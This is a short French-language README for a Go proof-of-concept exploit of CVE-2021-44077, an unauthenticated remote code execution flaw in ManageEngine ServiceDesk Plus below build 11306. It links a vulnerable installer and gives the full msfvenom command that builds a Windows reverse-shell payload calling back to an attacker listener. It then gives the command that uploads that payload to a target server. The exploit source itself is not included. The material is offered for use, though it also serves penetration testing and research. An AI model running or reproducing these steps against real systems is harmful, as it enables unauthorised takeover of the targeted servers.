
Exploit de preuve de concept en Golang pour CVE-2021-44077 : RCE sans authentification dans ManageEngine ServiceDesk Plus < 11306
Cet exploit est une RCE non authentifiée dans Zoho ManageEngine ServiceDesk Plus < 11306.
Vous pouvez trouver une version vulnérable du logiciel ici : http://archives.manageengine.com/service-desk/11303/ManageEngine_ServiceDesk_Plus_64bit.exe
Je n'ai pas trouvé de version Golang de cet exploit, donc voici la mienne. Mon code n'est pas parfait, alors utilisez-le à vos risques et périls.
Article de blog :
Créez une charge utile malveillante dans votre répertoire actuel.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > msiexec.exe
Ensuite, exécutez l'exploit.
go run CVE-2021-44077.go -u "http://192.168.1.3:8080/" -f "/msiexec.exe"
-u est l'URL vulnérable -f est votre fichier malveillant